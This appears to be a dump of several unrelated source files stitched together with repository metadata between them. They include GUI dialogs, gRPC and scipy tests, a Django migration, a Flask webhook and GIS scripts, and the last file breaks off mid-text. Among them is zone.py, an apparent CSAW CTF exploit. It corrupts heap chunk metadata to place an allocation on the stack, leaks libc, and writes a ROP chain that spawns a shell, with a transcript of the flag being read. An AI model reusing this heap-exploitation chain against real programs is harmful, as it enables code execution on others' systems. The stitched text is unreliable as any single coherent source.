__author__ = "David Rusk <drusk@uvic.ca>" import wx class CertificateDialog(wx.Dialog): def __init__(self, parent, handler, error_message): super(CertificateDialog, self).__init__(parent, title="Certificate Error") self.handler = handler self.error_message = error_message self._init_ui() self._do_layout() def _init_ui(self): self.header_text = wx.StaticText(self, label="An error has occured " "which likely indicates " "your CADC certificate " "is invalid:") self.error_text = wx.StaticText(self, label=self.error_message) error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC, wx.FONTWEIGHT_NORMAL) self.error_text.SetFont(error_font) self.prompt_text = wx.StaticText(self, label="Enter your CADC " "credentials to get a " "new certificate:") self.username_label = wx.StaticText(self, label="CADC Username: ") self.username_field = wx.TextCtrl(self) self.password_label = wx.StaticText(self, label="Password: ") self.password_field = wx.TextCtrl(self, style=wx.TE_PASSWORD) self.accept_button = wx.Button(self, label="Get certificate") self.cancel_button = wx.Button(self, label="Cancel") self.accept_button.Bind(wx.EVT_BUTTON, self.on_accept) self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel) self.username_field.SetFocus() self.accept_button.SetDefault() def _do_layout(self): vsizer = wx.BoxSizer(wx.VERTICAL) flag = wx.ALIGN_CENTER | wx.ALL border = 10 vsizer.Add(self.header_text, flag=flag, border=border) vsizer.Add(self.error_text, flag=flag, border=border) line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL) vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5) vsizer.Add(self.prompt_text, flag=flag, border=border) input_sizer = wx.FlexGridSizer(cols=2, hgap=5, vgap=border) input_sizer.Add(self.username_label) input_sizer.Add(self.username_field, proportion=1, flag=wx.EXPAND) input_sizer.Add(self.password_label, wx.EXPAND) input_sizer.Add(self.password_field, proportion=1, flag=wx.EXPAND) input_sizer.AddGrowableCol(1, proportion=1) vsizer.Add(input_sizer, flag=wx.EXPAND) button_sizer = wx.BoxSizer(wx.HORIZONTAL) button_sizer.Add(self.accept_button, flag=wx.RIGHT, border=5) button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5) vsizer.Add(button_sizer, flag=flag, border=border) padding_sizer = wx.BoxSizer(wx.HORIZONTAL) padding_sizer.Add(vsizer, flag=wx.ALL, border=20) self.SetSizerAndFit(padding_sizer) def on_cancel(self, event): self.Close() def on_accept(self, event): username = self.username_field.GetValue() password = self.password_field.GetValue() self.handler.refresh_certificate(username, password) self.Close() class RetryDownloadDialog(wx.Dialog): def __init__(self, parent, handler, error_message): super(RetryDownloadDialog, self).__init__(parent, title="Download Error") self.handler = handler self.error_message = error_message self._init_ui() self._do_layout() def _init_ui(self): self.header_text = wx.StaticText(self, label="One or more downloads " "failed:") self.error_text = wx.StaticText(self, label=self.error_message) error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC, wx.FONTWEIGHT_NORMAL) self.error_text.SetFont(error_font) self.retry_button = wx.Button(self, label="Retry") self.cancel_button = wx.Button(self, label="Cancel") self.retry_button.Bind(wx.EVT_BUTTON, self.on_accept) self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel) self.retry_button.SetDefault() def _do_layout(self): vsizer = wx.BoxSizer(wx.VERTICAL) flag = wx.ALIGN_CENTER | wx.ALL border = 10 vsizer.Add(self.header_text, flag=flag, border=border) vsizer.Add(self.error_text, flag=flag, border=border) line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL) vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5) button_sizer = wx.BoxSizer(wx.HORIZONTAL) button_sizer.Add(self.retry_button, flag=wx.RIGHT, border=5) button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5) vsizer.Add(button_sizer, flag=flag, border=border) padding_sizer = wx.BoxSizer(wx.HORIZONTAL) padding_sizer.Add(vsizer, flag=wx.ALL, border=20) self.SetSizerAndFit(padding_sizer) def on_cancel(self, event): self.Close() def on_accept(self, event): self.handler.retry_downloads() self.Close()
gpl-3.0
-8,906,130,566,601,220,000
36.244755
95
0.604131
false
3.622449
false
false
false
firebase/grpc-SwiftPM
src/python/grpcio_tests/tests_aio/unit/init_test.py
1
1698
# Copyright 2019 The gRPC Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import unittest import grpc from grpc.experimental import aio from tests_aio.unit._test_server import start_test_server from tests_aio.unit._test_base import AioTestBase class TestInsecureChannel(AioTestBase): async def test_insecure_channel(self): server_target, _ = await start_test_server() # pylint: disable=unused-variable channel = aio.insecure_channel(server_target) self.assertIsInstance(channel, aio.Channel) class TestSecureChannel(AioTestBase): """Test a secure channel connected to a secure server""" def test_secure_channel(self): async def coro(): server_target, _ = await start_test_server(secure=True) # pylint: disable=unused-variable credentials = grpc.local_channel_credentials( grpc.LocalConnectionType.LOCAL_TCP) secure_channel = aio.secure_channel(server_target, credentials) self.assertIsInstance(secure_channel, aio.Channel) self.loop.run_until_complete(coro()) if __name__ == '__main__': logging.basicConfig() unittest.main(verbosity=2)
apache-2.0
-660,082,624,246,504,200
32.294118
102
0.717314
false
4.023697
true
false
false
aggrent/cab
cab/migrations/0002_migrate_ratings.py
1
7081
# encoding: utf-8 from south.v2 import DataMigration from django.contrib.contenttypes.models import ContentType from django.db.models import signals from ratings.models import RatedItem, SimilarItem class Migration(DataMigration): def forwards(self, orm): signals.post_save.disconnect(sender=RatedItem, dispatch_uid='update_rating_score') try: ctype = ContentType.objects.get(app_label='cab', model='snippet') except ContentType.DoesNotExist: # If the content type doesn't even exist yet, this is probably a fresh installation return for rating in orm['cab.rating'].objects.all(): RatedItem.objects.create( user_id=rating.user.pk, object_id=rating.snippet.pk, content_type=ctype, score=rating.score) def backwards(self, orm): RatedItem.objects.all().delete() SimilarItem.objects.all().delete() models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'cab.bookmark': { 'Meta': {'object_name': 'Bookmark'}, 'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmarks'", 'to': "orm['cab.Snippet']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_bookmarks'", 'to': "orm['auth.User']"}) }, 'cab.language': { 'Meta': {'object_name': 'Language'}, 'file_extension': ('django.db.models.fields.CharField', [], {'max_length': '10'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'language_code': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}) }, 'cab.rating': { 'Meta': {'object_name': 'Rating'}, 'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ratings'", 'to': "orm['cab.Snippet']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_ratings'", 'to': "orm['auth.User']"}) }, 'cab.snippet': { 'Meta': {'object_name': 'Snippet'}, 'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'bookmark_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'code': ('django.db.models.fields.TextField', [], {}), 'description': ('django.db.models.fields.TextField', [], {}), 'description_html': ('django.db.models.fields.TextField', [], {}), 'highlighted_code': ('django.db.models.fields.TextField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cab.Language']"}), 'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'rating_score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'updated_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}) }, 'contenttypes.contenttype': { 'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['cab']
bsd-3-clause
-4,519,894,992,598,839,300
63.963303
163
0.551758
false
3.756499
false
false
false
integeruser/on-pwning
2017-csaw-quals/Zone/zone.py
1
3639
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * context(arch='amd64', os='linux', aslr=True, terminal=['tmux', 'neww']) if args['GDB']: elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so') io = gdb.debug('./zone-amd64-2.23-0ubuntu9', gdbscript='''\ c ''') elif args['REMOTE']: elf, libc = ELF('./zone'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so') io = remote('pwn.chal.csaw.io', 5223) else: elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so') io = process(['stdbuf', '-i0', '-o0', '-e0', './zone-amd64-2.23-0ubuntu9']) def allocate(size): io.recvuntil('5) Exit\n') io.sendline('1') io.sendline(str(size)) def delete_last(): io.recvuntil('5) Exit\n') io.sendline('2') io.recvuntil('Free') def write_last(data, newline=True): io.recvuntil('5) Exit\n') io.sendline('3') io.sendline(data) if newline else io.send(data) def print_last(): io.recvuntil('5) Exit\n') io.sendline('4') return io.recvline() io.recvuntil('Environment setup: ') stack_leak_address = int(io.recvline(), 16) success('stack leak address: %s' % hex(stack_leak_address)) # a chunk is of the form # {size|ptr to the next free chunk of same size|data} # allocate a 0x40 byte block allocate(0x40) # overflow the 65th byte of the block to be 0x80, so to modify the size of the next free block write_last('A' * 0x40 + chr(0x80), newline=False) # allocate another 0x40 byte block (the one with the size modified) allocate(0x40) # free this last block (which will be put at the top of the list of free chunks of size 0x80) delete_last() # allocate a chunk of size 0x80 to get this chunk allocate(0x80) # we can now write 0x80 characters into a chunk which is in the list of chunks of size 0x40 # so we can overflow in the next 0x40 chunk and mess its pointer to the next free chunk write_last(fit({cyclic_find('jaaaaaaa', n=8): p64(stack_leak_address + 0x80 - 0x8)})) # allocate two more 0x40 chunks # the second chunk will be in the stack (since, in the first chunk, we changed the pointer to the next free) allocate(0x40) allocate(0x40) # print the content of the chunk to leak an address from libc libc_leak_address = u64(print_last()[:6].ljust(8, '\x00')) success('libc leak address: %s' % hex(libc_leak_address)) libc.address = libc_leak_address - (libc.symbols['__libc_start_main'] + 240) success('libc address: %s' % hex(libc.address)) rop = ROP(libc) rop.system(next(libc.search('/bin/sh'))) print rop.dump() # write in the chunk to change the return address write_last(bytes(rop)) # exit to return to execute the rop chain io.recvuntil('5) Exit\n') io.sendline('5') io.interactive() # $ ./zone.py REMOTE # [+] Opening connection to pwn.chal.csaw.io on port 5223: Done # [*] '/home/ubuntu/vbox/zone' # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: No PIE (0x400000) # [*] '/home/ubuntu/vbox/libc-amd64-2.23-0ubuntu9.so' # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [+] stack leak address: 0x7ffd63409140 # [+] libc leak address: 0x7efc0b64a830 # [+] libc address: 0x7efc0b62a000 # [*] Loaded cached gadgets for './libc-amd64-2.23-0ubuntu9.so' # 0x0000: 0x7efc0b64b102 pop rdi; ret # 0x0008: 0x7efc0b7b6d17 # 0x0010: 0x7efc0b66f390 system # 0x0018: 'gaaahaaa' <pad> # [*] Switching to interactive mode # $ ls # flag # zone # $ cat flag # flag{d0n7_let_m3_g3t_1n_my_z0n3}
mit
7,253,582,822,140,688,000
30.921053
108
0.663094
false
2.663982
false
false
false
apbard/scipy
scipy/constants/tests/test_constants.py
2
3115
from __future__ import division, print_function, absolute_import from numpy.testing import assert_equal, assert_allclose from scipy._lib._numpy_compat import suppress_warnings import scipy.constants as sc def test_convert_temperature(): assert_equal(sc.convert_temperature(32, 'f', 'Celsius'), 0) assert_equal(sc.convert_temperature([0, 0], 'celsius', 'Kelvin'), [273.15, 273.15]) assert_equal(sc.convert_temperature([0, 0], 'kelvin', 'c'), [-273.15, -273.15]) assert_equal(sc.convert_temperature([32, 32], 'f', 'k'), [273.15, 273.15]) assert_equal(sc.convert_temperature([273.15, 273.15], 'kelvin', 'F'), [32, 32]) assert_equal(sc.convert_temperature([0, 0], 'C', 'fahrenheit'), [32, 32]) assert_allclose(sc.convert_temperature([0, 0], 'c', 'r'), [491.67, 491.67], rtol=0., atol=1e-13) assert_allclose(sc.convert_temperature([491.67, 491.67], 'Rankine', 'C'), [0., 0.], rtol=0., atol=1e-13) assert_allclose(sc.convert_temperature([491.67, 491.67], 'r', 'F'), [32., 32.], rtol=0., atol=1e-13) assert_allclose(sc.convert_temperature([32, 32], 'fahrenheit', 'R'), [491.67, 491.67], rtol=0., atol=1e-13) assert_allclose(sc.convert_temperature([273.15, 273.15], 'K', 'R'), [491.67, 491.67], rtol=0., atol=1e-13) assert_allclose(sc.convert_temperature([491.67, 0.], 'rankine', 'kelvin'), [273.15, 0.], rtol=0., atol=1e-13) def test_fahrenheit_to_celsius(): with suppress_warnings() as sup: sup.filter(DeprecationWarning, "`F2C` is deprecated!") assert_equal(sc.F2C(32), 0) assert_equal(sc.F2C([32, 32]), [0, 0]) def test_celsius_to_kelvin(): with suppress_warnings() as sup: sup.filter(DeprecationWarning, "`C2K` is deprecated!") assert_equal(sc.C2K([0, 0]), [273.15, 273.15]) def test_kelvin_to_celsius(): with suppress_warnings() as sup: sup.filter(DeprecationWarning, "`K2C` is deprecated!") assert_equal(sc.K2C([0, 0]), [-273.15, -273.15]) def test_fahrenheit_to_kelvin(): with suppress_warnings() as sup: sup.filter(DeprecationWarning, "`F2K` is deprecated!") sup.filter(DeprecationWarning, "`F2C` is deprecated!") sup.filter(DeprecationWarning, "`C2K` is deprecated!") assert_equal(sc.F2K([32, 32]), [273.15, 273.15]) def test_kelvin_to_fahrenheit(): with suppress_warnings() as sup: sup.filter(DeprecationWarning, "`K2F` is deprecated!") sup.filter(DeprecationWarning, "`K2C` is deprecated!") sup.filter(DeprecationWarning, "`C2F` is deprecated!") assert_equal(sc.K2F([273.15, 273.15]), [32, 32]) def test_celsius_to_fahrenheit(): with suppress_warnings() as sup: sup.filter(DeprecationWarning, "`C2F` is deprecated!") assert_equal(sc.C2F([0, 0]), [32, 32]) def test_lambda_to_nu(): assert_equal(sc.lambda2nu(sc.speed_of_light), 1) def test_nu_to_lambda(): assert_equal(sc.nu2lambda(1), sc.speed_of_light)
bsd-3-clause
973,531,989,903,674,900
38.43038
79
0.608026
false
3.000963
true
false
false
longaccess/longaccess-client
lacli/upload.py
1
8840
from lacli.exceptions import PauseEvent from lacli.pool import MPUpload from lacli.source.chunked import ChunkedFile from lacore.storage.s3 import MPConnection from lacore.api import UploadState as BaseUploadState from contextlib import contextmanager from lacli.log import getLogger from lacli.progress import queueHandler from lacli.control import ControlHandler from lacli.worker import WorkerPool from lacore.async import block from twisted.internet import defer, threads from itertools import count from multiprocessing import TimeoutError from multiprocessing import get_logger as mp_logging_init import errno import signal class LogHandler(queueHandler): def __init__(self, logger='lacli'): self.logger = getLogger(logger) def handle(self, msg): self.logger.handle(msg) class UploadState(BaseUploadState): states = None @classmethod def has_state(cls, fname): if cls.states is None: cls.setup() if fname in cls.states: return True return False @classmethod def init(cls, cache): cls.cache = cache @classmethod def setup(cls): uploads = cls.cache._get_uploads() a = cls.cache._for_adf('archives') sz = lambda f: a[f]['archive'].meta.size cls.states = {k: cls(k, sz(k), **v) for k, v in uploads.iteritems() if k in a} @classmethod def get(cls, fname, size=None, capsule=None, sandbox=False): if cls.states is None: cls.setup() if fname in cls.states: state = cls.states[fname] msg = "Can't change {} for upload" if size is not None: assert state.size == size, msg.format('size') cls.states[fname].size = size if capsule is not None: # might be helpful if you want to change the capsule if state.capsule is None: state.capsule = capsule cid = state.capsule.get('id', None) assert cid == capsule['id'], msg.format('capsule') cls.states[fname].capsule = capsule if sandbox is True: assert state.sandbox == sandbox, msg.format('sandbox status') cls.states[fname].sandbox = True return cls.states[fname] cls.states[fname] = UploadState(fname, size, capsule=capsule, sandbox=sandbox) return cls.states[fname] @classmethod def reset(cls, fname): if cls.states is None: cls.setup() if fname not in cls.states: raise ValueError("Upload doesn't exist!") cls.cache._del_upload(fname) return cls.states.pop(fname) def __init__(self, archive, size, keys=[], exc=None, paused=True, **kwargs): super(UploadState, self).__init__(archive, size, **kwargs) self.cache = type(self).cache self.logfile = self.control = None self.keys = keys self.progress = reduce(lambda x, y: x + y['size'], self.keys, 0) self.pausing = False self._paused = paused self.exc = exc self.deferred_upload = None def __enter__(self): try: self.exc = None self.control = ControlHandler() self.logfile = self.cache._upload_open(self.archive, mode='r+') getLogger().debug("Found state file for %s", self.archive) except IOError as e: if e.errno == errno.ENOENT: getLogger().debug("Creating state file for %s", self.archive) self.logfile = self.cache._upload_open(self.archive, mode='w+') else: raise e # update keys from file upload = self.cache._validate_upload(self.logfile) self.uri = upload.get('uri', self.uri) self.keys = upload.get('keys', self.keys) if self._paused is True: self._paused = False self.cache._write_upload( self.uri, self.capsule, self.logfile, self.exc, self._paused) return self @block @defer.inlineCallbacks def wait_for_upload(self): try: result = yield self.deferred_upload defer.returnValue(result) except PauseEvent: pass if self.pausing is True: self.paused() def __exit__(self, type, value, traceback): if type is not None: if type == PauseEvent: getLogger().debug("upload paused.") self.paused() else: getLogger().debug("error in upload", exc_info=True) self.error(value) if self.logfile is not None: self.logfile.close() self.logfile = self.control = None return type is None def keydone(self, key, size): assert self.logfile is not None, "Log not open" self.keys.append( self.cache._checkpoint_upload(key, size, self.logfile)) def update(self, progress): self.progress = progress @property def seq(self): return len(self.keys) def pause(self): if not self.pausing and self.control is not None: self.control.pause() self.pausing = True def paused(self): getLogger().debug("upload state paused") if self.exc is not None: getLogger().debug("can't pause a failed upload") return self._paused = True if self.pausing is True: self.pausing = False self.cache._write_upload( self.uri, self.capsule, self.logfile, self.exc, self._paused) def active(self): return self._paused is False and self.exc is None def signal(self, sig, frame): getLogger().debug("Got interrupt") if sig == signal.SIGINT: getLogger().debug("Pausing") if self.pausing is True: raise SystemExit("Interrupted") self.pausing = True self.control.pause() def save_op(self, op): assert self.uri is None, "Can't change URI for upload state" if op.uri is None: return self.cache._write_upload(op.uri, self.capsule, self.logfile, self.exc, self._paused) self.uri = op.uri def error(self, exc): if self.exc is None: self.cache._write_upload(self.uri, self.capsule, self.logfile, str(exc), self._paused) self.exc = exc class Upload(object): def __init__(self, session, nprocs, debug, state): self.prefs = { 'nprocs': nprocs, 'debugworker': debug > 2 } self.log = LogHandler() self.state = state @contextmanager def _workers(self, progq): with self.log as logq: with self.state.control as ctrlq: mp_logging_init() pool = WorkerPool( self.prefs, logq, progq, ctrlq) try: yield pool finally: getLogger().debug("terminating pool") pool.terminate() pool.join() def upload_temp(self, token, source, etags, pool, seq): key = "temp-archive-{seq}".format(seq=seq) connection = MPConnection(**token) with MPUpload(connection, source, key) as uploader: etags[key], source = uploader.get_result( uploader.submit_job(pool)) return source @defer.inlineCallbacks def upload(self, fname, upload, progq): with self._workers(progq) as pool: etags = {} source = ChunkedFile(fname, self.state.progress) token = yield upload.status for seq in count(start=self.state.seq): try: source = yield threads.deferToThread( self.upload_temp, token, source, etags, pool, seq) except PauseEvent: getLogger().debug( "paused after uploading %d temporary keys", seq) raise except TimeoutError: getLogger().debug( "timeout after uploading %d temporary keys", seq) token = yield upload.status if source is None: getLogger().debug("uploaded entire archive") break getLogger().debug("uploaded %d temp keys", len(etags)) for key, tag in etags.iteritems(): getLogger().debug("key: %s (etag: %s)", key, tag) # vim: et:sw=4:ts=4
apache-2.0
7,196,664,246,178,638,000
33.131274
79
0.552262
false
4.337586
false
false
false
MukunthanAlagarsamy/UCC_attempt1
app.py
1
1772
#!/usr/bin/env python import urllib import json import os from flask import Flask from flask import request from flask import make_response # Flask app should start in global layout app = Flask(__name__) @app.route('/webhook', methods=['POST']) def webhook(): req = request.get_json(silent=True, force=True) print("Request:") print(json.dumps(req, indent=4)) res = makeWebhookResult(req) res = json.dumps(res, indent=4) print(res) r = make_response(res) r.headers['Content-Type'] = 'application/json' return r def makeWebhookResult(req): if req.get("result").get("action") != "shipping.cost": return {} if req.get("result").get("action") == "shipping.cost": result = req.get("result") parameters = result.get("parameters") zone = parameters.get("shipping-zone") cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500} speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros." if req.get("result").get("action") == "product.identification": # result = req.get("result") # parameters = result.get("parameters") # zone = parameters.get("producttype") # cost = {'TV':100, 'Mobile':"Whats the problem with your Mobile", 'Bank':'Whats the problem with your Bank'} speech = "Thank u" print("Response:") print(speech) return { "speech": speech, "displayText": speech, #"data": {}, # "contextOut": [], "source": "apiai-onlinestore-shipping" } if __name__ == '__main__': port = int(os.getenv('PORT', 5000)) print "Starting app on port %d" % port app.run(debug=True, port=port, host='0.0.0.0')
apache-2.0
590,739,204,705,281,700
25.447761
116
0.597065
false
3.508911
false
false
false
ProstoKSI/django-weed
djweed/db_fields.py
1
2767
from django.contrib.contenttypes.models import ContentType try: from django.core.urlresolvers import reverse except ImportError: # Django 2.0 from django.urls import reverse from django.db.models.fields.files import FieldFile, FileField from django.utils import six from .storage import WeedFSStorage class WeedFSFieldFile(FieldFile): def _split_name(self): splitted_name = self.name.split(':', 1) if len(splitted_name) == 2: return splitted_name return splitted_name[0], '' def _get_storage_fid(self): return self._split_name()[0] storage_fid = property(_get_storage_fid) def _get_verbose_name(self): return self._split_name()[1] verbose_name = property(_get_verbose_name) def _get_content(self): self._require_file() return self.storage.content(self.storage_fid) content = property(_get_content) def _get_url(self): self._require_file() content_type = ContentType.objects.get_for_model(self.instance._meta.model) return reverse('weedfs_get_file', kwargs={ 'content_type_id': content_type.id, 'object_id': self.instance.id, 'field_name': self.field.name, 'file_name': self.verbose_name, }) url = property(_get_url) def _get_storage_url(self): self._require_file() return self.storage.url(self.storage_fid) storage_url = property(_get_storage_url) class WeedFSFileField(FileField): # The class to wrap instance attributes in. Accessing the file object off # the instance will always return an instance of attr_class. attr_class = WeedFSFieldFile def __init__(self, verbose_name=None, name=None, storage=None, **kwargs): kwargs.pop('upload_to', None) storage = kwargs.pop('storage', None) if storage is None: storage = WeedFSStorage() super(WeedFSFileField, self).__init__(verbose_name, name, storage=storage, **kwargs) def get_prep_value(self, value): "Returns field's value prepared for saving into a database." # Need to convert File objects provided via a form to unicode for database insertion if value is None: return None if isinstance(value, six.string_types): return six.text_type(value) if value.name == '': return '' if isinstance(value, WeedFSFieldFile): return value.name return self.storage.save(None, value) def south_field_triple(self): from south.modelsinspector import introspector field_class = "django.db.models.fields.CharField" args, kwargs = introspector(self) return (field_class, args, kwargs)
mit
4,202,618,077,747,209,000
32.743902
92
0.641128
false
3.924823
false
false
false
COCS4950G7/COSC4950
Resources/Tkinter Examples/Tkinter_example.py
1
1256
#import Tkinter #l = Tkinter.Label(text = "***************************See me?*************************") #l.pack() #l.mainloop() #print("Howdy") #omfg #print("dostuff") # http://www.ferg.org/thinking_in_tkinter/all_programs.html from Tkinter import * class MyApp: def __init__(self, parent): self.myParent = parent ### (7) remember my parent, the root self.myContainer1 = Frame(parent) self.myContainer1.pack() self.button1 = Button(self.myContainer1) self.button1.configure(text="OK", background= "green") self.button1.pack(side=LEFT) self.button1.bind("<Button-1>", self.button1Click) ### (1) self.button2 = Button(self.myContainer1) self.button2.configure(text="Cancel", background="red") self.button2.pack(side=RIGHT) self.button2.bind("<Button-1>", self.button2Click) ### (2) def button1Click(self, event): ### (3) if self.button1["background"] == "green": ### (4) self.button1["background"] = "yellow" else: self.button1["background"] = "green" def button2Click(self, event): ### (5) self.myParent.destroy() ### (6) root = Tk() myapp = MyApp(root) root.mainloop()
gpl-3.0
5,148,761,549,873,680,000
19.95
88
0.57086
false
3.305263
false
false
false
barthoekstra/Orographic-Landscape-Navigator
gisactions.py
1
1466
#!/usr/bin/python # This code is simply a wrapper for running gdal commands, without MATLAB # causing issues with dependencies, etc. import sys import os print(sys.argv[0]) action = sys.argv[1] targetfile = sys.argv[2] if action == "merge": print('Mergeing...') # gdalbuildvrt merged.vrt r14bn2.wgs84.tif r14en1.wgs84.tif r14ez1.wgs84.tif r14bz2.wgs84.tif r14bz1.wgs84.tif r14bn1.wgs84.tif r09dz1.wgs84.tif r09dz2.wgs84.tif r09gz1.wgs84.tif # gdalbuildvrt output.vrt files-to-be-merged.tif separated-by-spaces.tif # python gisactions.py merge data/dem/output.vrt data/dem/r14bn2.wgs84.tif data/dem/r14bn1.wgs84.tif # First create a virtual mosaic # Cmd format: gdalbuildvrt output.vrt file1.tif file2.tif file3.tif print('Creating mosaic...') targetvrt = targetfile.replace(".tif", ".vrt") cmd_mosaic = "gdalbuildvrt %s %s" % (targetvrt, ' '.join(sys.argv[3:])) os.system(cmd_mosaic) # Now translate the mosaic to an actual GeoTiff # Cmd format: gdal_translate -of GTiff mosaic.vrt output.tif mergedfile = sys.argv[2].replace(".wgs84.tif", ".merged.wgs84.vrt") cmd_merge = "gdal_translate -a_srs \"+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs\" -of GTiff %s %s" % (targetvrt, targetfile) os.system(cmd_merge) # Now remove the .vrt os.remove(targetvrt) print('Merge finished...') elif action == "reproject": print('Reprojecting...') else: print('No valid action provided.')
gpl-3.0
-5,237,369,659,882,149,000
35.65
182
0.697817
false
2.745318
false
false
false
MaxTyutyunnikov/lino
obsolete/src/lino/apps/pizzeria/services.py
1
2711
## Copyright 2003-2007 Luc Saffre ## This file is part of the Lino project. ## Lino is free software; you can redistribute it and/or modify it ## under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## Lino is distributed in the hope that it will be useful, but WITHOUT ## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY ## or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public ## License for more details. ## You should have received a copy of the GNU General Public License ## along with Lino; if not, write to the Free Software Foundation, ## Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA from lino.adamo.ddl import * from lino.adamo.datatypes import itod from lino.apps.pizzeria import pizzeria #from lino.apps.pizzeria.pizzeria import Orders, Products, OrderLines, Customers class Service(pizzeria.Product): tableName="Services" def initTable(self,table): pizzeria.Product.initTable(self,table) table.addField('responsible',STRING) class ServicesReport(DataReport): leadTable=Service class MyPizzeriaSchema(pizzeria.PizzeriaSchema): tableClasses = (pizzeria.Product, Service, pizzeria.Customer, pizzeria.Order, pizzeria.OrderLine) class MyPizzeriaMain(pizzeria.PizzeriaMain): schemaClass=MyPizzeriaSchema """ Welcome to MyPizzeria, a customization of the most 